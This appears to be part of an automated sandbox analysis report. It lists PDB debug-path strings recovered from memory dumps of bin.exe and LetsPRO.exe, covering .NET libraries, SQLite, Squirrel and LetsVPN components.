                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdb source: bin.exe, 00000017.00000003.1600056818.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Globalization.Extensions/netfx\System.Globalization.Extensions.pdb source: bin.exe, 00000017.00000003.1575333150.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb source: bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: bin.exe, 00000017.00000003.1529710100.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: bin.exe, 00000017.00000003.1646188460.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: bin.exe, 00000017.00000003.1633109053.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Formatters\4.0.2.0\System.Runtime.Serialization.Formatters.pdb source: bin.exe, 00000017.00000003.1611174675.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.ReaderWriter\4.1.1.0\System.Xml.ReaderWriter.pdb source: bin.exe, 00000017.00000003.1640720262.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdbSHA256 source: bin.exe, 00000017.00000003.1618601938.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks.Parallel\4.0.1.0\System.Threading.Tasks.Parallel.pdb source: bin.exe, 00000017.00000003.1632215391.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdbSHA256 source: bin.exe, 00000017.00000003.1510230437.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdbSHA256aP source: bin.exe, 00000017.00000003.1639573458.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets.Client\4.0.2.0\System.Net.WebSockets.Client.pdb source: bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdb source: bin.exe, 00000017.00000003.1531546889.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdb source: bin.exe, 00000017.00000003.1627316997.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdbSHA256 source: bin.exe, 00000017.00000003.1577950171.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb source: bin.exe, 00000017.00000003.1580441083.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdbL source: bin.exe, 00000017.00000003.1549496484.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Mono.Cecil.Pdb.dll source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\Microsoft.Expression.Interactions\Win32\Release\Microsoft.Expression.Interactions.pdb source: bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdb source: bin.exe, 00000017.00000003.1565142472.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdbSHA256a? source: bin.exe, 00000017.00000003.1536976844.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb source: bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890076416.0000000005C72000.00000002.00000001.01000000.0000001D.sdmp
                Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\System.Windows.Interactivity\Win32\Release\System.Windows.Interactivity.pdb source: bin.exe, 00000017.00000003.1640216842.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel\4.0.1.0\System.ComponentModel.pdb source: bin.exe, 00000017.00000003.1561840053.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb source: bin.exe, 00000017.00000003.1606248215.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdbSHA256a3 source: bin.exe, 00000017.00000003.1625556136.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdbSHA256K source: bin.exe, 00000017.00000003.1628247172.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\webview2_api_writer\dotNetAPIWrapper\Microsoft.Web.WebView2.Core\bin\ReleasePackage\Microsoft.Web.WebView2.Core.pdb source: bin.exe, 00000017.00000003.1534392709.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdbSHA256 source: bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: bin.exe, 00000017.00000003.1599554048.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdb source: bin.exe, 00000017.00000003.1586338671.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdbSHA256x source: bin.exe, 00000017.00000003.1564522155.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdb source: bin.exe, 00000017.00000003.1539910501.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdbH,b, T,_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1595737967.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdb source: bin.exe, 00000017.00000003.1619977368.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdbSHA256 source: bin.exe, 00000017.00000003.1626199430.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdb source: bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb source: bin.exe, 00000017.00000003.1585838723.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdb source: bin.exe, 00000017.00000003.1586870010.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XDocument\4.0.11.0\System.Xml.XDocument.pdb source: bin.exe, 00000017.00000003.1641195155.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdbd+~+ p+_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1560411692.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdbSHA256 source: bin.exe, 00000017.00000003.1539910501.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: bin.exe, 00000017.00000003.1574111221.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdbSHA256Uu source: bin.exe, 00000017.00000003.1626865159.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading\4.0.11.0\System.Threading.pdb source: bin.exe, 00000017.00000003.1638461725.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: bin.exe, 00000017.00000003.1576354512.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: bin.exe, 00000017.00000003.1541597025.0000000002734000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmp
                Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdb source: bin.exe, 00000017.00000003.1630497195.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdb source: bin.exe, 00000017.00000003.1568304896.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebHeaderCollection\4.0.1.0\System.Net.WebHeaderCollection.pdb source: bin.exe, 00000017.00000003.1597771215.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding.Extensions\4.0.11.0\System.Text.Encoding.Extensions.pdb source: bin.exe, 00000017.00000003.1628787314.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: bin.exe, 00000017.00000003.1604218262.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdbSHA256 source: bin.exe, 00000017.00000003.1548032073.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Specialized\4.0.3.0\System.Collections.Specialized.pdb source: bin.exe, 00000017.00000003.1557388355.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\vendor\nuget\src\Core\obj\Release\NuGet.Squirrel.pdb source: bin.exe, 00000017.00000003.1542970100.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdb source: bin.exe, 00000017.00000003.1527350811.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Mono.Cecil.PdbG source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdbSHA2569v'` source: bin.exe, 00000017.00000003.1591734252.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.NonGeneric\4.0.3.0\System.Collections.NonGeneric.pdb source: bin.exe, 00000017.00000003.1553986968.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdbSHA256 source: bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdb source: bin.exe, 00000017.00000003.1551101243.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdbSHA256 source: bin.exe, 00000017.00000003.1537619804.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdb source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: OriginalFilenameMono.Cecil.Pdb.dll6 source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.MsDelta\obj\Release\DeltaCompressionDotNet.MsDelta.pdb source: bin.exe, 00000017.00000003.1510836959.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdbSHA256 source: bin.exe, 00000017.00000003.1538114528.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdb source: bin.exe, 00000017.00000003.1621744394.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ComponentModel.Annotations/netfx\System.ComponentModel.Annotations.pdb source: bin.exe, 00000017.00000003.1558973587.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdb source: bin.exe, 00000017.00000003.1595737967.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Watcher\4.0.2.0\System.IO.FileSystem.Watcher.pdb source: bin.exe, 00000017.00000003.1579812131.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdb source: bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdb source: bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPN\obj\Release\LetsPRO.pdb source: bin.exe, 00000017.00000003.1524518889.0000000002738000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdb source: bin.exe, 00000017.00000003.1602379822.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdb source: bin.exe, 00000017.00000003.1621198141.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.PatchApi\obj\Release\DeltaCompressionDotNet.PatchApi.pdb source: bin.exe, 00000017.00000003.1511520441.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdb source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdb source: bin.exe, 00000017.00000003.1601628106.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdb source: bin.exe, 00000017.00000003.1625012758.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x64\e_sqlite3.pdb source: bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdbon source: bin.exe, 00000017.00000003.1535471188.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdb source: bin.exe, 00000017.00000003.1617972564.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdbSHA256 source: bin.exe, 00000017.00000003.1624001905.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: bin.exe, 00000017.00000003.1545901293.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb source: bin.exe, 00000017.00000003.1570344266.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb'MAM 3M_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1572509011.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: FileDescriptionMono.Cecil.Pdb2 source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: bin.exe, 00000017.00000003.1545901293.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Debug\4.0.11.0\System.Diagnostics.Debug.pdb source: bin.exe, 00000017.00000003.1566880284.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications\obj\Release\ToastNotifications.pdb source: bin.exe, 00000017.00000003.1644794214.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: bin.exe, 00000017.00000003.1531102979.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdbSHA256 source: bin.exe, 00000017.00000003.1573124674.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: bin.exe, 00000017.00000003.1512955071.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb4)N) @)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1617348748.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdb source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.Cci.Pdb source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdbh) source: bin.exe, 00000017.00000003.1586338671.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdb source: bin.exe, 00000017.00000003.1628247172.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdbT*n* `*_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1596763609.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\arm\e_sqlite3.pdb source: bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.ThreadPool\4.0.12.0\System.Threading.ThreadPool.pdb source: bin.exe, 00000017.00000003.1634271910.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb|( source: bin.exe, 00000017.00000003.1536326659.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdb source: bin.exe, 00000017.00000003.1543633291.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: bin.exe, 00000017.00000003.1509476332.0000000002739000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.1884979889.0000000000B4D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 00000036.00000000.1873262546.0000000000B4D000.00000002.00000001.01000000.00000018.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Tools\4.0.1.0\System.Diagnostics.Tools.pdb source: bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdb source: bin.exe, 00000017.00000003.1585292674.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Threading.Overlapped/netfx\System.Threading.Overlapped.pdb source: bin.exe, 00000017.00000003.1631006621.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb+CEC 7C_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890076416.0000000005C72000.00000002.00000001.01000000.0000001D.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdb source: bin.exe, 00000017.00000003.1537619804.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Xml/netfx\System.Runtime.Serialization.Xml.pdb source: bin.exe, 00000017.00000003.1613581369.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization\4.0.11.0\System.Globalization.pdb source: bin.exe, 00000017.00000003.1575833413.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdbt+ source: bin.exe, 00000017.00000003.1643180881.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb|( source: bin.exe, 00000017.00000003.1594016654.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdb source: bin.exe, 00000017.00000003.1637794932.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Security.Cryptography.Algorithms/netfx\System.Security.Cryptography.Algorithms.pdb source: bin.exe, 00000017.00000003.1616190581.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Parallel\4.0.1.0\System.Linq.Parallel.pdb source: bin.exe, 00000017.00000003.1589652681.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: bin.exe, 00000017.00000003.1548032073.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdb source: bin.exe, 00000017.00000003.1560411692.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: bin.exe, 00000017.00000003.1532085148.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdbSHA256 source: bin.exe, 00000017.00000003.1619977368.0000000002737000.00000004.00000020.00020000.00000000.sdmp
